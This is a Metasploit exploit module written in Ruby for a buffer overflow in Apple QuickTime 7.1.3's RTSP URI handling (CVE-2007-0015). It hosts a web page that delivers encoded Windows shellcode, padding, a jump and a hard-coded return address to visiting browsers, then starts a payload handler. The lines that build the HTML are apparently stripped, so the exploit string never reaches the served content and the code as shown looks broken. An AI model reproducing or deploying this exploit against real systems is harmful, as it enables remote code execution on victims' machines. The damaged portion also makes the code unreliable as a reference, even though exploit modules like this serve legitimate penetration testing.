## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Apple QuickTime 7.1.3. This module was inspired by MOAB-01-01-2007. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0015' ], [ 'OSVDB', '31023' ], [ 'BID', '21829' ], [ 'URL', 'http://projects.info-pull.com/moab/MOAB-01-01-2007.html' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40", }, 'Platform' => 'win', 'Targets' => [ [ 'Apple QuickTime Player 7.1.3', { 'Ret' => 0x6855d8a2 } ], # xpsp2/2k3 :( | vista ;) ], 'Privileged' => false, 'DisclosureDate' => 'Jan 1 2007', 'DefaultTarget' => 0)) end def on_request_uri(client, request) return if ((p = regenerate_payload(client)) == nil) cruft = rand_text_english(4) sploit = rand_text_english(307) + payload.encoded + "\xeb\x06" + rand_text_english(2) sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV') content = "" + "" content << "

\n" print_status("Sending #{self.name} to #{client.peerhost}:#{client.peerport}...") send_response(client, content, { 'Content-Type' => 'text/html' }) # Handle the payload handler(client) end end